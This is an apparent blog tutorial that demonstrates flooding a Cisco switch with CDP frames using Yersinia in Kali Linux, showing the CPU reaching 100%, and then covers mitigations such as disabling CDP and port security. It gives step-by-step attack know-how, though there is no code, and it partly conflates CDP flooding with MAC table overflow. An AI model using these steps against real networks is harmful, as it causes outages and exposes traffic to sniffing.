This is an easy Denial of Service (DoS) attack to launch. We’re going to use the Cisco Discovery Protocol (CDP) to bring a switch to its knees. It literally only took me 5 minutes to completely destroy this enterprise class switch.
Watch, learn and be afraid.
Normally CDP is used by network engineers to view the network topology. For example, if you log into a switch and type:
show cdp neighbors
you’ll see directly connected devices that are also using CDP. It’s a basic verification tool.
I just cleared the CPU table on my switch so my table is empty but normally you’ll see useful data about other devices on your network.
If I do a show cdp traffic I can see there’s hardly anything going on. Activity is minimal.
But what happens if you start flooding my switch with thousands of CDP messages?
Destroying a Cisco switch with CDP flooding
We can freeze the operating system running on the switch which effectively blocks anyone from remotely managing the switch. We can also lock up the CPU which causes the switch to start dropping network traffic. But that’s not the only thing a CDP flood does.
When a switch is overwhelmed and can no longer forward frames it will start to forward frames out all ports just like a hub.
This means an attacker could fire up a protocol analyzer such as Wireshark and start sniffing and collecting sensitive data on your network. Why? Because normally a switch only forwards frames directly to the destination MAC so a user capturing frames on switchport 2 will only see frames on switchport 2. But when the MAC address table fills up the switch starts forwarding frames out all ports which makes it really easy for an intruder to see things he shouldn’t see.
When the MAC address table overflows the switch will start dropping frames.
Let’s look at the CPU before the attack:
show process cpu sorted | include CPU|PID Runtime|CDP Protocol
The output is showing us that for the past five seconds our CPU usage was a mere 0.08%.
Now let’s kick open Yersinia in Kali Linux and destroy the switch.
Click Launch attack in the upper left corner of the Yersinia GUI
In the CDP tab, pick flooding CDP table from the list.
Yersinia immediately starts pelting the switch with over 2000 CDP frames per second!
Now let’s return to the switch to see the damage we did.
show cdp neighbors now shows tens of thousands of bogus devices all originating from Yersinia.
This is very very very bad.
If you don’t believe me just look at the CPU on our switch.
Do you see that little part where it says CPU utilization for five seconds is 99%/100%?
Yup; the CPU is done.
The Bottom Line
So how do you stop something like this? One way to obviate a CDP flood attack is to disable CDP on the entire switch:
config t no cdp run
or you can pick specific interfaces that don’t need it
config t int gi3/0/1 no cdp enable
The other more viable option is to enable port security on the switch. I explained how to do this in my article on DHCP starvation attacks. The idea is that you can confine access to a switchport to a specific layer 2 MAC address. Since the Kali box running Yersinia isn’t an approved MAC address it wouldn’t be permitted to launch the attack.
What do you think about this? Have you ever seen someone fry a switch with a CDP flood?